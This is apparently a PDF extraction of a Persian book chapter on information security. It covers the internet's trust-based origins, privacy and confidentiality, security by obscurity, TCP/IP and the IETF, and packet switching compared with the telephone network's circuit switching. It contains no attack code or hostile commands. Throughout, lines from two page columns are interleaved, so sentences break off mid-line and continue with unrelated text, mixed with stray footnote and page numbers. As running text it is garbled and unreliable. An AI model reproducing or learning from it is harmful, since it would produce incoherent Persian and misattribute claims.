‫ﻣﺨﺘﻠﻒ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﺍﻫﺪﺍﻑ ﻳﻜـﺴﺎﻥ ﺩﺍﺷـﺘﻨﺪ ﻭ ﺑـﺎ ﻫـﺪﻑ‬ ‫ﺍﺩﺍﺭﻩ ﻧﮕﻬﺪﺍﺭﻳﻢ ﺗﺎ ﺩﺭ ﻣﻮﺍﻗﻌﻲ ﭼﻮﻥ ﺑﺮﻭﺯ ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﻳﺎ ﺳـﺎﻳﺮ‬
‫ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺷﺘﻦ ﻣﻨﺎﺑﻊ ﻭ ﺩﺍﺩﻩﻫﺎ ﻛﺎﺭ ﻣﻲﻛﺮﺩﻧﺪ؛ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ‬ ‫ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ﺍﺯ ﺁﻧﻬﺎ ﺣﻔﺎﻇﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﻢ‪ .‬ﺑﻌﻀﻲ ﺍﻃﻼﻋﺎﺕ ﺭﺍ‬
‫ﺷﺒﻜﻪ ﻣﺤﺪﻭﺩ ﺑﻪ ﺍﻋﻀﺎﻱ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻣﻲﺷﺪ ﻭ ﻟﺬﺍ ﺩﺭ ﺁﻥ ﺯﻣﺎﻥ‬ ‫ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ ﻭ ﺑـﺴﺘﻪ ﺑـﻪ‬
‫ﻧﮕﺮﺍﻧﻲ ﭼﻨﺪﺍﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﻧﺪﺍﺷـﺖ‪.‬‬ ‫ﺩﺭﺟﺔ ﺍﻫﻤﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﻓـﺮﺍﺩ ﻣﺨﺘﻠـﻒ ﺩﺭ ﺳـﻄﻮﺡ‬
‫ﻃﺮﺍﺣﻲ ﺷﺒﻜﻪ ﺟﻬﺎﻧﻲ ﻭﺏ ﻧﻴﺰ ﺑﺮ ﻫﻤﻴﻦ ﺍﺳﺎﺱ ﺷﻜﻞ ﮔﺮﻓﺖ ﺗـﺎ‬ ‫ﻣﺘﻔﺎﻭﺗﻲ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩ‪.‬‬
‫ﻳﻚ ﺍﺑﺰﺍﺭ ﻗﻮﻱ ﺑﺮﺍﻱ ﻛﺸﻒ ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﻗـﺮﺍﺭﺩﺍﺩﻥ ﺁﻥ ﺩﺭ‬
‫ﺍﺯ ﻧﻈــﺮ ﻣﻔﻬــﻮﻣﻲ ﻣﻴــﺎﻥ ﻣﺎﻫﻴــﺖ ﺗﻬﺪﻳــﺪﺍﺕ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﻭ‬
‫ﺍﺧﺘﻴﺎﺭ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﺎﺷﺪ؛ ﺑﺪﻭﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻲ ﺑﺮﺍﻱ ﻛﺴﺐ‬
‫ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻫﻴﭻ ﺗﻔﺎﻭﺗﻲ ﻧﻴـﺴﺖ‪،‬‬
‫ﻣﺠﻮﺯ ﻳﺎ ﺗﺴﻬﻴﻞ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﻣﺎﻟﻲ‪.‬‬
‫ﺑﻠﻜﻪ ﺗﻔﺎﻭﺕ ﺍﻳـﻦ ﺩﻭ ﻣﻘﻮﻟـﻪ ﺑﺮﺧﺎﺳـﺘﻪ ﺍﺯ ﺧـﺼﻮﺻﻴﺎﺕ ﻓـﻀﺎﻱ‬
‫ﻓﺮﻫﻨﮓ ﺑـﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ ﭘﮋﻭﻫـﺸﮕﺮﺍﻥ ﻭ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻳﻦ ﺣﻮﺯﻩ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻴﺎﻥ ﻃﻲ ﺩﻫﺔ ‪ ۹۰‬ﺗﻮﺳﻂ ‪ ARPANET‬ﻣﻄﺮﺡ ﺷـﺪ ﻭ‬ ‫ﺑﺘﻮﺍﻥ ﺍﺯ ﺑﺮﻭﺯ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺧﻨﺜﻲ‪ ،‬ﻳﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻭ‬
‫ﻫﻨﻮﺯ ﻫﻢ ﻧﺸﺎﻧﻪﻫـﺎﻳﻲ ﺍﺯ ﺁﻥ ﺩﻳـﺪﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﺑـﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ‬ ‫ﺭﻓﻊ ﻧﻤﻮﺩ‪.‬‬
‫ﻓﺮﻫﻨﮓ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺷـﺒﻜﺔ ﺟﻬـﺎﻧﻲ ﻭﺏ ﺗـﺎ ﺣـﺪ ﻣﻤﻜـﻦ ﺩﺭ‬
‫ﻋﻨﺎﻭﻳﻦ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪ ٣٣‬ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ٣٤‬ﺑﺎ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴـﺖ ﺩﺭ‬
‫ﺩﺳﺘﺮﺱ ﻭ ﺭﺍﻳﮕﺎﻥ ﺍﺳﺖ ﻭ ﺍﻣﻜﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ ﺻـﺪﻫﺎ‬
‫ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ "ﺧﺼﻮﺻﻲ" ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧـﺪ ﺗﻨﻬـﺎ‬
‫ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ ﺍﺯ ﻣﺮﺩﻡ ﺩﺭ ﺳﺮﺗﺎﺳﺮ ﺟﻬﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻭﺍﻗﻌﹰﺎ ﺧﺼﻮﺻﻲ ﺑﻤﺎﻧﻨﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺫﺧﻴﺮﻩ‬
‫ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ﻭ ﭘﺎﺳﺨﻲ ﺑﻪ ﺍﻳﻦ ﺳـﺆﺍﻝ ﻣـﻲﺑﺎﺷـﺪ ﻛـﻪ ﭼـﺮﺍ‬
‫ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﮕﻮﻧـﻪﺍﻱ ﺭﻓﺘـﺎﺭ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺗﺎ ﺍﻣﺮﻭﺯ ﺑﻪ ﺍﻳـﻦ ﺳـﻄﺢ ﺍﺯ ﺭﺷـﺪ ﺭﺳـﻴﺪﻩ ﺍﺳـﺖ‪ .‬ﺟﻨﺒـﺔ‬
‫ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﮔﻮﻳﻲ ﭼﻨﻴﻦ ﺍﻃﻼﻋﺎﺗﻲ ﻭﺟﻮﺩ ﺧﺎﺭﺟﻲ ﻧﺪﺍﺭﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺍﺧﻼﻗــﻲ ﺍﻳــﻦ ﻓﺮﻫﻨــﮓ ﺩﺭ ﮔﻔﺘﮕﻮﻫــﺎﻱ ﻋﺎﻣﻴﺎﻧــﺔ ﻣﺮﺩﻣــﻲ ﻛــﻪ‬
‫ﺳﻴﺎﺳﺖ ﺭﺍ ﺍﻣﻨﻴـﺖ ﮔﻤﻨـﺎﻣﻲ‪ ٣٥‬ﻣـﻲ ﻧﺎﻣﻨـﺪ‪ .‬ﺑـﻪ ﻫﻤـﻴﻦ ﺗﺮﺗﻴـﺐ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﻨﺒﻌـﻲ ﺑـﺴﻴﺎﺭ ﺧـﻮﺏ ﻭ ﻣﻌﺘﺒـﺮ ﺗﻮﺻـﻴﻒ ﻣـﻲﻛﻨﻨـﺪ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔـﺬﺍﺭﺩﻩ ﺷـﻮﻧﺪ‬
‫ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﺩ؛ ﭼﺮﺍﻛﻪ ﻗﺪﺭﺕ ﺭﺳﺎﻧﻪﺍﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺍﺛﺮﺍﺕ ﻛـﺎﺭ‬
‫ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺍﻧﺪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ‬
‫ﺑﺎ ﺁﻧﺮﺍ ﺩﻳﺪﻩﺍﻧﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﺭ ﻣـﻮﺭﺩ ﻣﺎﻫﻴـﺖ ﺍﻳﻨﺘﺮﻧـﺖ ﮔﻔﺘـﻪ‬
‫ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﻫﻤﻴﺸﻪ ﺩﺭ ﻳﻚ ﻣﻜﺎﻥ ﻧﻴﺴﺘﻨﺪ ﻫﻨﮕﺎﻡ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ "ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻥ ﺗﻤﺎﻳﻞ ﺑﻪ ﺁﺯﺍﺩ ﺑﻮﺩﻥ ﺩﺍﺭﻧﺪ"‪.‬‬
‫ﺍﻧﺘﻘﺎﻝ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﺎﻓﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ‬
‫ﻳﻚ ﺗﻮﺟﻴﻪ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻥ‬ ‫ﺍﻋﻤﺎﻝ ﺷﻮﺩ‪.‬‬
‫ﺍﺳﺖ ﻛﻪ ﻧﺴﻞ ﺍﻭﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮ ﺍﺳﺎﺱ ﺍﻋﺘﻤﺎﺩ ﻣﺘﻘﺎﺑﻞ ﺍﻳﺠﺎﺩ ﺷﺪﻩ‬
‫ﻣﻮﻗﻌﻴﺘﻬﺎﻳﻲ ﻧﻈﻴﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪،‬‬
‫ﺑﻮﺩ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﺷﻜﺎﺭﺍ ﺑﺮﺍﻱ ﻛـﺎﺭ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺑـﻪ ﻫـﻢ ﺍﻋﺘﻤـﺎﺩ‬
‫ﻭﻟﻲ ﺑﺎ ﻓﺮﺽ ﻃﺒﻴﻌـﺖ ﺧـﺎﺹ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻭ ﺍﺭﺗﺒـﺎﻁ ﻣﻴـﺎﻥ‬
‫ﻣﻲﻛﺮﺩﻧﺪ‪ .‬ﺑﺎ ﮔﺴﺘﺮﺵ ﻭﺳﻴﻊ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺑـﻪ ﻋـﻀﻮﻳﺖ ﺩﺭﺁﻣـﺪﻥ‬
‫ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻣﻮﺟــﻮﺩ ﺩﺭ ﺁﻥ‪ ،‬ﺍﻣﻨﻴــﺖ ﮔﻤﻨــﺎﻣﻲ ﻳــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺍﻓﺮﺍﺩ ﺑﻴﺸﺘﺮ ﺑﺎ ﻋﻼﻳﻖ ﻭ ﺍﻫﺪﺍﻑ ﻣﺨﺘﻠﻒ ﺩﺭ ﺁﻥ‪ ،‬ﺍﻋﺘﻤـﺎﺩ ﻣﺘﻘﺎﺑـﻞ‬
‫ﭘﻨﻬﺎﻥﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻲ ﺿﻌﻴﻒ ﻣـﻲﻧﻤﺎﻳـﺪ ﻭ ﺑﺎﻳـﺪ ﺍﺯ ﺁﻥ ﺍﺟﺘﻨـﺎﺏ‬
‫ﻣﻌﻨﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻳﻜـﻲ ﺍﺯ ﻣﺒﺎﺣـﺚ‬
‫ﻋﻤﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻌﺔ ﻣﻔﻬـﻮﻡ ﻧـﻮﻳﻦ ﺍﻋﺘﻤـﺎﺩ ﻣﺘﻘﺎﺑـﻞ ﺍﺳـﺖ‬
‫‪33‬‬ ‫‪Privacy‬‬
‫‪34‬‬ ‫‪Confidentiality‬‬
‫‪35‬‬ ‫‪Security By Obscurity‬‬
‫‪٣٥‬‬ ‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬

‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﺯ ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ ﺷـﺒﻜﻪﺍﻱ ﺍﺯ ﺷـﺒﻜﻪﻫـﺎ‬ ‫ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻣﺆﺛﺮ‪ ،‬ﻭﺍﻗﻊ ﮔﺮﺍﻳﺎﻧﻪ‪ ،‬ﻭ ﺑﺴﺎﺩﮔﻲ ﻗﺎﺑـﻞ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ ﻛﻪ ﻫﺮ ﺷﺒﻜﻪﺍﻱ ﻛـﻪ ﺑـﻪ ﺧـﺎﻧﻮﺍﺩﻩﺍﻱ ﺍﺯ ﭘﺮﻭﺗﻜـﻞ‬ ‫ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‬

‫‪ ٣٨TCP/IP‬ﺗﻌﻠﻖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﻥ ﻣﺘـﺼﻞ ﺷـﻮﺩ ﻭ‬ ‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻗﺒـﻞ ﺍﺯ ﺧـﻮﺩ ﭼﻨـﺪﻳﻦ ﺗﻔـﺎﻭﺕ‬
‫ﺑﺨﺸﻲ ﺍﺯ ﺁﻥ ﻣﺤﺴﻮﺏ ﮔﺮﺩﺩ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﻛﻪ ﻣﺠﻤﻮﻋﺔ ﺍﻳـﻦ‬ ‫ﺍﺳﺎﺳﻲ ﺩﺍﺭﺩ ﻛﻪ ﻫﺮ ﻛﺪﺍﻡ ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﺑﻌـﻀﻲ‬
‫ﭘﺮﻭﺗﻜﻠﻬﺎ ﺭﺍ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﻨﺪ ﺗﻮﺳﻂ ‪ ٣٩IETF‬ﺍﺭﺍﺋﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ‬ ‫ﺍﺯ ﺍﻳﻦ ﺗﻔﺎﻭﺗﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑـﺎ ﺷـﺒﻜﺔ ﺗﻠﻔـﻦ ﻋﻤـﻮﻣﻲ‬
‫ﻻ ﺑﺪﻧﺔ ﻓﻨﻲ ﻏﻴﺮﺭﺳﻤﻲ ﺁﻧﻬﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﺷﺎﻳـﺴﺘﻪﺳـﺎﻻﺭﻱ‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫ﺳﻮﺋﻴﭻ ﺷﺪﻩ )‪ ٣٦(PSTN‬ﻛـﻪ ﺭﻭﺯﺍﻧـﻪ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺩﻧﻴـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻓﻨﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﻮﺍﻓﻘﻲ ﺗﺪﻭﻳﻦ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﻣﻲﺷﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﻢ ﺑﻬﺘﺮ ﺩﺭﻙ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧــﺖ ﻏﻴﺮﻣﺘﻤﺮﻛــﺰ ﺍﺳــﺖ ﻭ ﺩﺭ ﺁﻥ ﻫــﻴﭻ ﺳﻴــﺴﺘﻢ ﻣﺮﻛــﺰﻱ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﺳﺎﺱ ﻣﺪﻟﻲ ﺍﺯ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻛـﺎﺭ ﻣـﻲ ﻛﻨـﺪ ﻛـﻪ‬
‫ﺍﺭﺗﺒﺎﻃﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻭ ﻫﻤﻴﻨﻜﻪ ﺷـﻤﺎ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺍﺻـﻠﻲ ﺁﻥ‬ ‫‪ Packet Switching‬ﻧﺎﻡ ﺩﺍﺭﺩ‪ .‬ﻫﺮ ﺯﻣـﺎﻥ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺯ‬
‫ﻧﻈﻴﺮ ‪ TCP/IP‬ﭘﻴﺮﻭﻱ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷـﺒﻜﻪ ﺧـﻮﺩ ﺭﺍ‬ ‫ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻋﺒﻮﺭ ﻣﻲ ﻛﻨﺪ ﺑـﻪ ﭼﻨـﺪﻳﻦ ﺑـﺴﺘﺔ ﺩﺍﺩﻩ ﺷﻜـﺴﺘﻪ‬
‫ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺷـﺪﻩ ﻭ ﻫـﺮ ﻛـﺪﺍﻡ ﺑـﺼﻮﺭﺕ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻫﻤﻪﺟـﺎ ﺭﺍﻳـﺞ ﺍﺳـﺖ ﻭ ﻣﻮﺍﻧـﻊ ﻭﺭﻭﺩ ﺑـﻪ ﺁﻥ ﺍﻧـﺪﻙ‬ ‫ﻣﺴﺘﻘﻞ ﺩﺭ ﺷﺒﻜﻪ ﺍﺭﺳﺎﻝ ﻭ ﭘﺲ ﺍﺯ ﺩﺭﻳﺎﻓـﺖ ﺩﺭ ﻣﻘـﺼﺪ ﻣﺠـﺪﺩﹰﺍ‬
‫‪٤٠‬‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﻣﻘﺪﺍﺭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ )ﺳﺮﻋﺘﻲ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺑـﺎ ﺁﻥ‬ ‫ﺳﺮﻫﻢﺑﻨﺪﻱ ﻣﻲﺷﻮﻧﺪ )ﻣﺴﻴﺮ ﺍﺭﺳﺎﻝ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ(‪ .‬ﺍﻳـﻦ‬
‫ﺍﻧﺘﻘﺎﻝ ﺩﻫﻴـﺪ( ﻧﻴﺰ ﺑﻪ ﻇﺮﻓﻴﺖ ﺣﻤـﻞ ﺳـﻴﻤﻬﺎﻱ ﻣـﺴﻲ‪ ،‬ﺍﺗـﺼﺎﻻﺕ‬ ‫ﺭﻭﺵ ﺍﻧﺘﻘـﺎﻝ ﺩﺭ ﻧﻘﻄـﺔ ﻣﻘﺎﺑـﻞ ‪ - Circuit Switching‬ﻛـﻪ‬
‫ﻓﻴﺒﺮﻱ ﻳﺎ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﻭﺍﻗﻊ ﺩﺭ ﻣـﺴﻴﺮ ﺍﻧﺘﻘـﺎﻝ ﺑـﺴﺘﮕﻲ‬ ‫‪ PSTN‬ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ‪ -‬ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﺑـﻪ‬
‫ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺷﺎﻫﺮﺍﻩ ﺁﻥ ﻃﻴﻔﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻣﻐﻨﺎﻃﻴﺴﻲ ﻛﻤﻴـﺎﺏ ﻭﺟـﻮﺩ‬ ‫ﻫﺮ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﻳﻚ ﻣﺪﺍﺭ ﻭﺍﺣﺪ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﻟـﺬﺍ‬
‫ﻧﺪﺍﺭﻧﺪ‪ .‬ﻫﺮﺟﺎ ﻛـﻪ ﺍﺯ ﻃﻴـﻒ ﺭﺍﺩﻳـﻮﻳﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﮔـﺮﺩﺩ ‪ -‬ﻣﺎﻧﻨـﺪ‬ ‫ﺩﺭ ﺁﻥ ﺣﺠﻢ ﺻﺪﺍﻱ ﺍﻧﺘﻘﺎﻝ ﻳﺎﻓﺘﻪ ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ ﻣﻬﻢ ﻧﻴﺴﺖ‪.‬‬
‫ﻻ ﺑـﺎ ﻋﻨـﻮﺍﻥ‬ ‫ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ )‪ ٤١(WLANs‬ﻛﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺭﺳﺎﻧﻪﺍﻱ ﻧﺎﺩﺍﻥ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺗﻤﺎﻡ ﺁﻧﭽﻪ ﻛـﻪ ﻣـﻲﺩﺍﻧـﺪ‬
‫‪ Wi-Fi‬ﺍﺯ ﺁﻧﻬﺎ ﻧﺎﻡ ﺑﺮﺩﻩ ﻣﻲﺷﻮﺩ ‪ -‬ﻗﻮﺍﻧﻴﻦ ﻭ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺮﺗﺒﻂ‬ ‫ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﻳﻚ ﺑﺴﺘﻪ ﺭﺍ ﺍﺯ ﻳﻚ ﻣﺒﺪﺃ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﻪ‬
‫ﻳﻚ ﻣﺤﻴﻂ ﺍﺷﺘﺮﺍﻛﻲ ﺭﺍ ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﻧﺪ ﻛـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺳـﺎﺩﻩ‬ ‫‪٣٧‬‬
‫ﻳﻚ ﻣﻘﺼﺪ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﺮﺳﺎﻧﺪ‪ .‬ﺗﻤﺎﻣﻲ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ‬
‫ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﺩﺭ ﺍﻧﺘﻬﺎ ﻭ ﺩﺭ ﻟﺒﻪﻫﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻣﻲﺭﺳﻨﺪ ﻛﻪ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻮﺳﻂ ﻭﺍﻗﻊ ﺩﺭ ﺑﺨـﺸﻬﺎﻳﻲ ﺍﺯ ﺩﻧﻴـﺎ ﻛـﻪ‬ ‫ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻋﻮﺽ ﺩﺭ ‪ PSTN‬ﺍﺳﺎﺱ ﻛﺎﺭ ﺷـﺒﻜﻪ "ﻫﻮﺷـﻤﻨﺪﻱ"‬
‫ﻣﻜﺎﻟﻤﺎﺕ ﺗﻠﻔﻨﻲ ﻣﺤﻠﻲ ﺩﺭ ﺁﻧﻬﺎ ﺭﺍﻳﮕﺎﻥ ﺍﺳﺖ ﻧـﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻥ ﺗﻤـﺎﻡ‬ ‫ﺍﺳﺖ ﻭ ﺍﺑـﺰﺍﺭ ﻛـﺎﺭﺑﺮ ﺩﺭ ﻧﻘـﺎﻁ ﺍﻧﺘﻬـﺎﻳﻲ ﻛـﺎﺭﺑﺮﺩ ﺍﻧـﺪﻛﻲ ﺑـﺮﺍﻱ‬
